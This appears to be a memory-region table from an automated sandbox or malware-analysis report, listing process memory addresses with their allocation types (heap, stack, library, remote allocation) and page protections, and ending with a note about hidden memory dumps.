page read and write
2238AD65000
trusted library allocation
page read and write
6169F7E000
stack
page read and write
7D175EF000
stack
page read and write
26025A4B000
trusted library allocation
page read and write
2603DA3B000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BB32000
trusted library allocation
page read and write
26023C60000
heap
page execute and read and write
201E82A0000
trusted library allocation
page read and write
22388E7B000
heap
page read and write
26025511000
trusted library allocation
page read and write
2CBA388D000
heap
page read and write
7FFD9BA0A000
trusted library allocation
page read and write
2603593B000
trusted library allocation
page read and write
2CBA00D0000
heap
page read and write
22388D60000
heap
page read and write
2603DA20000
heap
page read and write
201E82D0000
heap
page readonly
7D17E7B000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BA02000
trusted library allocation
page read and write
260357AC000
trusted library allocation
page read and write
26027201000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9BA42000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
26023A98000
heap
page read and write
2238A96A000
trusted library allocation
page read and write
616A07E000
stack
page read and write
2238A920000
trusted library allocation
page read and write
260258D8000
trusted library allocation
page read and write
201EA26C000
heap
page read and write
20181969000
trusted library allocation
page read and write
7D178FD000
stack
page read and write
20181C3D000
trusted library allocation
page read and write
26026B4F000
trusted library allocation
page read and write
6169E7C000
stack
page read and write
22389060000
heap
page read and write
2CBA1BC5000
heap
page read and write
F30000
heap
page read and write
260239D0000
heap
page read and write
B90000
heap
page read and write
2603DC62000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
223A2DB0000
heap
page execute and read and write
7D179FE000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
22388F90000
heap
page execute and read and write
DB5947E000
stack
page read and write
201EA28A000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
223A2F95000
heap
page read and write
26025A8E000
trusted library allocation
page read and write
20181976000
trusted library allocation
page read and write
201E9D60000
heap
page execute and read and write
201EA240000
heap
page read and write
2603DFE0000
heap
page read and write
26025509000
heap
page read and write
201E9DE5000
heap
page read and write
6169FFF000
stack
page read and write
260258D0000
trusted library allocation
page read and write
26025AA4000
trusted library allocation
page read and write
223A2CFB000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
26025500000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
947D07C000
stack
page read and write
2CB9FEFC000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
201E82C0000
trusted library allocation
page read and write
314F000
stack
page read and write
2468DF4D000
heap
page read and write
7D18A0E000
stack
page read and write
2974E3C0000
heap
page read and write
2CB9FF0A000
heap
page read and write
22388E75000
heap
page read and write
2DCC000
stack
page read and write
2238A834000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
2CB9FE80000
heap
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
223A2F52000
heap
page read and write
DB5A68D000
stack
page read and write
20181950000
trusted library allocation
page read and write
2CB9FEAF000
heap
page read and write
26026B62000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
616A13E000
stack
page read and write
201EA30A000
heap
page read and write
DB59A3F000
stack
page read and write
22388DE0000
trusted library allocation
page read and write
2603DD41000
heap
page read and write
7FFD9B862000
trusted library allocation
page read and write
22388DA0000
heap
page read and write
22388E30000
heap
page read and write
7FFD9B894000
trusted library allocation
page read and write
201E9D90000
heap
page read and write
26026B5E000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
26023CA5000
heap
page read and write
7FFD9B87D000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page execute and read and write
7FFD9BA41000
trusted library allocation
page read and write
260238F0000
heap
page read and write
26023AD8000
heap
page read and write
201EA440000
heap
page read and write
26026EB2000
trusted library allocation
page read and write
7FFD9B86B000
trusted library allocation
page read and write
2CB9FF28000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9BA95000
trusted library allocation
page read and write
6169EFE000
stack
page read and write
7FFD9B9F2000
trusted library allocation
page read and write
2238A811000
trusted library allocation
page read and write
223A2CB0000
heap
page read and write
223A2D5A000
heap
page read and write
2239A811000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
7FFD9BA80000
trusted library allocation
page execute and read and write
223A2F6B000
heap
page read and write
2238904A000
heap
page read and write
1110000
heap
page read and write
2238AC0C000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2602725E000
trusted library allocation
page read and write
There are 578 hidden memdumps, click here to show them.